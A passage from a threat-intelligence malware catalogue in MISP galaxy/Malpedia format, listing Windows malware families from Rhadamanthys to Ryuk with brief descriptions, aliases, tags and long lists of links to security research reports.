https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

https://community.riskiq.com/article/3315064b

https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://twitter.com/resecurity_com/status/1412662343796813827

https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent

https://www.flashpoint-intel.com/blog/revil-disappears-again/

https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/

https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/

https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox

https://sites.temple.edu/care/ci-rw-attacks/

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf

https://www.youtube.com/watch?v=QYQQUUpU04s

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain

https://ke-la.com/will-the-revils-story-finally-be-over/

https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf

https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

http://www.secureworks.com/research/threat-profiles/gold-southfield

https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.secureworks.com/research/threat-profiles/gold-southfield

https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html

https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

Rhadamanthys

According to PCrisk, Rhadamanthys is a stealer-type malware and, as its name implies, it is designed to extract data from infected machines.

At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.

The tag is: misp-galaxy:malpedia="Rhadamanthys"

Rhadamanthys is also known as:

Table 4447. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://outpost24.com/blog/rhadamanthys-malware-analysis/

https://www.accenture.com/us-en/blogs/security/information-stealer-malware-on-dark-web

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-resident-campaign

https://research.checkpoint.com/2023/rhadamanthys-the-everything-bagel-infostealer/

https://www.malware-traffic-analysis.net/2023/01/03/index.html

https://www.zscaler.com/blogs/security-research/technical-analysis-rhadamanthys-obfuscation-techniques

https://threatmon.io/rhadamanthys-stealer-analysis-threatmon/

https://research.checkpoint.com/2023/from-hidden-bee-to-rhadamanthys-the-evolution-of-custom-executable-formats/

https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023

https://www.secureworks.com/research/the-growing-threat-from-infostealers

https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks

https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

Rhino

Ransomware.

The tag is: misp-galaxy:malpedia="Rhino"

Rhino is also known as:

Table 4448. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhino

https://www.vmray.com/cyber-security-blog/rhino-ransomware-malware-analysis-spotlight/

RHttpCtrl

The tag is: misp-galaxy:malpedia="RHttpCtrl"

RHttpCtrl is also known as:

Table 4449. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/

Rietspoof

Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.

The tag is: misp-galaxy:malpedia="Rietspoof"

Rietspoof is also known as:

Table 4451. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof

https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-spoofing-reeds-rietspoof/

https://blog.avast.com/rietspoof-malware-increases-activity

https://decoded.avast.io/threatintel/spoofing-in-the-reeds-with-rietspoof/

Rikamanu

The tag is: misp-galaxy:malpedia="Rikamanu"

Rikamanu is also known as:

Table 4453. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

Rincux

The tag is: misp-galaxy:malpedia="Rincux"

Rincux is also known as:

Table 4454. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux

https://www.virusbulletin.com/uploads/pdf/conference_slides/2011/Edwards-Nazario-VB2011.pdf

RisePro

RisePro is a stealer that is spread through downloaders like win.privateloader. Once executed on a system, the malware can steal credit card information, passwords, and personal data.

The tag is: misp-galaxy:malpedia="RisePro"

RisePro is also known as:

Table 4456. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.risepro

https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/

https://embee-research.ghost.io/identifying-risepro-panels-using-censys/

https://blog.sekoia.io/new-risepro-stealer-distributed-by-the-prominent-privateloader/

RM3

Created from the codebase of Gozi/ISFB.

The tag is: misp-galaxy:malpedia="RM3"

RM3 is also known as:

Table 4458. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rm3

https://research.nccgroup.com/2021/05/04/rm3-curiosities-of-the-wildest-banking-malware/

https://twitter.com/URSNIFleak

RoarBAT

According to SOCRadar, this is a batch script that uses WinRAR to delete files with target file extensions from a disk.

The tag is: misp-galaxy:malpedia="RoarBAT"

RoarBAT is also known as:

Table 4460. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.roar_bat

https://socradar.io/sandworm-attackers-use-winrar-to-wipe-data-from-government-devices/

RobinHood

The tag is: misp-galaxy:malpedia="RobinHood"

RobinHood is also known as:

  • RobbinHood

Table 4461. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.robinhood

https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/

https://www.bleepingcomputer.com/news/security/a-closer-look-at-the-robbinhood-ransomware/

https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://blogs.quickheal.com/a-new-ransomware-goodwill-hacks-the-victims-for-charity-read-more-to-know-more-about-this-ransomware-and-how-it-affects-its-victims/

https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf

https://arstechnica.com/information-technology/2019/05/baltimore-city-government-hit-by-robbinhood-ransomware/

https://www.bleepingcomputer.com/news/security/ransomware-exploits-gigabyte-driver-to-kill-av-processes/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/

https://statescoop.com/baltimore-ransomware-crowdstrike-extortion/

https://twitter.com/VK_Intel/status/1121440931759128576

https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://www.sentinelone.com/blog/robinhood-ransomware-coolmaker-function-not-cool/

https://krebsonsecurity.com/2019/06/report-no-eternal-blue-exploit-found-in-baltimore-city-ransomware/

https://goggleheadedhacker.com/blog/post/12

https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/

rock

The tag is: misp-galaxy:malpedia="rock"

rock is also known as:

  • yellowalbatross

Table 4462. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rock

Rofin

The tag is: misp-galaxy:malpedia="Rofin"

Rofin is also known as:

Table 4464. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin

Rokku

The tag is: misp-galaxy:malpedia="Rokku"

Rokku is also known as:

Table 4466. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku

https://blog.malwarebytes.com/threat-analysis/2016/04/rokku-ransomware/

RokRAT

It is a backdoor commonly distributed as an encoded binary file that is downloaded and decrypted by shellcode following the exploitation of weaponized documents. DOGCALL is capable of capturing screenshots, logging keystrokes, evading analysis with anti-virtual-machine detections, and leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex.

The tag is: misp-galaxy:malpedia="RokRAT"

RokRAT is also known as:

  • DOGCALL

Table 4467. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat

https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/

http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

https://github.com/ssp4rk/slides/blob/master/2019SAS_Behind_of_the_Mask_of_ScarCruft.pdf

https://medium.com/s2wlab/matryoshka-variant-of-rokrat-apt37-scarcruft-69774ea7bf48

http://v3lo.tistory.com/24

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://threatmon.io/reverse-engineering-rokrat-a-closer-look-at-apt37s-onedrive-based-attack-vector/

https://www.ibm.com/downloads/cas/Z81AVOY7

https://blog.malwarebytes.com/threat-analysis/2021/01/retrohunting-apt37-north-korean-apt-used-vba-self-decode-technique-to-inject-rokrat/

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf

https://research.checkpoint.com/2023/chain-reaction-rokrats-missing-link/

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/

https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf

https://asec.ahnlab.com/en/51751/

http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html

https://twitter.com/ESETresearch/status/1575103839115804672

https://www.volexity.com/blog/2021/08/24/north-korean-bluelight-special-inkysquid-deploys-rokrat/

https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/

https://medium.com/s2wblog/scarcruft-bolsters-arsenal-for-targeting-individual-android-devices-97d2bcef4ab

https://securityintelligence.com/posts/itg10-targeting-south-korean-entities/

https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html

http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

http://blog.talosintelligence.com/2017/04/introducing-rokrat.html

https://unit42.paloaltonetworks.com/atoms/moldypisces/

https://www.youtube.com/watch?v=uoBQE5s2ba4

https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/

https://securelist.com/apt-trends-report-q2-2019/91897/

https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/

ROLLCOAST

ROLLCOAST is a ransomware program that encrypts files on logical drives attached to a system. ROLLCOAST is a Dynamic Link Library (DLL) with no named exports. When observed by Mandiant, it uniquely had only one ordinal export, 0x01. This suggested the sample was designed to avoid detection and be invoked in memory, possibly through BEACON provided to affiliates. Incident responders working on similar intrusions should capture memory for analysis.

The tag is: misp-galaxy:malpedia="ROLLCOAST"

ROLLCOAST is also known as:

  • Arcane

  • S4bb47h

  • Sabbath

Table 4468. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rollcoast

https://www.mandiant.com/resources/sabbath-ransomware-affiliate

Rombertik

The tag is: misp-galaxy:malpedia="Rombertik"

Rombertik is also known as:

  • CarbonGrabber

Table 4470. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik

http://blogs.cisco.com/security/talos/rombertik

Romeo(Alfa,Bravo, …​)

The tag is: misp-galaxy:malpedia="Romeo(Alfa,Bravo, …​)"

Romeo(Alfa,Bravo, …​) is also known as:

Table 4472. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos

Roopirs

The tag is: misp-galaxy:malpedia="Roopirs"

Roopirs is also known as:

Table 4474. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs

Roopy

The tag is: misp-galaxy:malpedia="Roopy"

Roopy is also known as:

Table 4475. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.roopy

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

RotorCrypt

Ransomware that was discovered over the last months of 2016 and is likely based on Gomasom, another ransomware family.

The tag is: misp-galaxy:malpedia="RotorCrypt"

RotorCrypt is also known as:

  • RotoCrypt

  • Rotor

Table 4479. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt

https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html

https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/

RoyalCli

RoyalCli is a backdoor which appears to be an evolution of BS2005 and uses familiar encryption and encoding routines. The name RoyalCli was chosen by us due to a debugging path left in the binary. RoyalCli and BS2005 both communicate with the attacker’s command and control (C2) through Internet Explorer (IE) by using the COM interface IWebBrowser2.

The tag is: misp-galaxy:malpedia="RoyalCli"

RoyalCli is also known as:

Table 4482. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli

https://www.secureworks.com/research/threat-profiles/bronze-palace

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/

https://github.com/nccgroup/Royal_APT

Royal Ransom (Windows)

Ransomware

The tag is: misp-galaxy:malpedia="Royal Ransom (Windows)"

Royal Ransom (Windows) is also known as:

Table 4484. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_ransom

https://www.coalitioninc.com/blog/active-exploitation-firewalls

https://www.trellix.com/en-us/about/newsroom/stories/research/a-royal-analysis-of-royal-ransom.html

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-royal-ransomware

https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65

https://securityscorecard.pathfactory.com/research/the-royal-ransomware

https://www.cyber.gov.au/acsc/view-all-content/advisories/2023-01-acsc-ransomware-profile-royal

https://arcticwolf.com/resources/blog/follow-on-extortion-campaign-targeting-victims-of-akira-and-royal-ransomware/

https://www.fortinet.com/blog/threat-research/ransomware-roundup-royal-ransomware

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

https://socradar.io/dark-web-profile-royal-ransomware/

https://unit42.paloaltonetworks.com/royal-ransomware/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://yoroi.company/research/reconstructing-the-last-activities-of-royal-ransomware/

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.prodaft.com/m/reports/RIG_TLP_CLEAR-1.pdf

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.cybereason.com/blog/royal-ransomware-analysis

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/

https://www.cyber.gov.au/about-us/advisories/2023-01-acsc-ransomware-profile-royal

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.bridewell.com/insights/news/detail/hunting-for-ursnif

https://www.logpoint.com/en/blog/exploring-the-exploit-of-royal-ransomware/

Ruckguv

The tag is: misp-galaxy:malpedia="Ruckguv"

Ruckguv is also known as:

Table 4489. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv

https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear

Rumish

The tag is: misp-galaxy:malpedia="Rumish"

Rumish is also known as:

Table 4490. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish

Running RAT

NJCCIC characterizes RunningRAT as a remote access trojan (RAT) that operates using two DLL files. When the trojan is loaded onto a system, it executes the first DLL. This is used to disable anti-malware solutions, unpack and execute the main RAT DLL, and gain persistence. The trojan installs a Windows batch file dx.bat that attempts to kill the daumcleaner.exe task, a Korean security program. The file then attempts to remove itself. Once the second DLL is loaded into memory, the first DLL overwrites the IP address of the control server to change the address the trojan communicates with. The second DLL gathers information about the victim’s system, including its operating system, drivers and processor. The RAT can log user keystrokes, copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and more. The second DLL also uses several anti-debugging techniques.

The tag is: misp-galaxy:malpedia="Running RAT"

Running RAT is also known as:

  • running_rat

Table 4491. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

RURansom

RURansom shows characteristics of typical ransomware, but despite its name, TrendMicro’s analysis suggested that this malware is more a wiper than ransomware, because of the irreversible destruction of the encrypted files.

The tag is: misp-galaxy:malpedia="RURansom"

RURansom is also known as:

Table 4492. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ruransom

https://blog.cyble.com/2022/03/11/new-wiper-malware-attacking-russia-deep-dive-into-ruransom-malware/

https://blogs.vmware.com/security/2022/04/ruransom-a-retaliatory-wiper.html

https://www.trendmicro.com/en_us/research/22/c/new-ruransom-wiper-targets-russia.html

Rurktar

The tag is: misp-galaxy:malpedia="Rurktar"

Rurktar is also known as:

  • RCSU

Table 4493. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar

https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction

RustBucket (Windows)

The tag is: misp-galaxy:malpedia="RustBucket (Windows)"

RustBucket (Windows) is also known as:

Table 4494. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.rustbucket

https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/

https://sansorg.egnyte.com/dl/3P3HxFiNgL

Ryuk

Ryuk is ransomware that encrypts its victim’s files and demands a ransom in bitcoin to release the original files. It has been observed being used to attack companies and professional environments. Cybersecurity experts found that Ryuk and the Hermes ransomware share pieces of code. Hermes is commodity ransomware that has been observed for sale on dark-net forums and used by multiple threat actors.

The tag is: misp-galaxy:malpedia="Ryuk"

Ryuk is also known as:

Table 4496. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.youtube.com/watch?v=Of_KjNG9DHc

https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://twitter.com/anthomsec/status/1321865315513520128

https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker

https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike

https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/

https://www.hhs.gov/sites/default/files/bazarloader.pdf

https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/

https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/

https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/

https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html

https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/

https://twitter.com/SophosLabs/status/1321844306970251265

https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf

https://twitter.com/IntelAdvanced/status/1356114606780002308

https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/

https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf

https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/

https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html

https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/

https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit_John_Hammond_Huntress_Analyzing_Ryuk.pdf

https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/

https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf

https://twitter.com/SecurityJoes/status/1402603695578157057

https://www.youtube.com/watch?v=BhjQ6zsCVSc

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/

https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html

https://blog.cyberint.com/ryuk-crypto-ransomware

https://community.riskiq.com/article/c88cf7e6

https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/

https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html

https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects

https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.youtube.com/watch?v=CgDtm05qApE

https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html

https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes

https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders

https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption

https://twitter.com/IntelAdvanced/status/1353546534676258816

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021

https://www.youtube.com/watch?v=7xxRunBP5XA

https://twitter.com/Prosegur/status/1199732264386596864

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://github.com/scythe-io/community-threats/tree/master/Ryuk

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/

https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/

https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html

https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/

https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/

https://strapi.eurepoc.eu/uploads/Eu_Repo_C_APT_profile_Conti_Wizard_Spider_dc2a733e18.pdf

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/

https://www.eldiario.es/tecnologia/capos-cibercrimen-avisan-contratacaran-si-hackea-rusia_1_8795458.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://0xchina.medium.com/malware-reverse-engineering-31039450af27

https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html

https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf

https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://arcticwolf.com/resources/blog/karakurt-web

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/

https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf

https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/

https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/

https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware

https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/

https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/

https://www.crowdstrike.com/blog/wizard-spider-adversary-update/

https://unit42.paloaltonetworks.com/ryuk-ransomware/

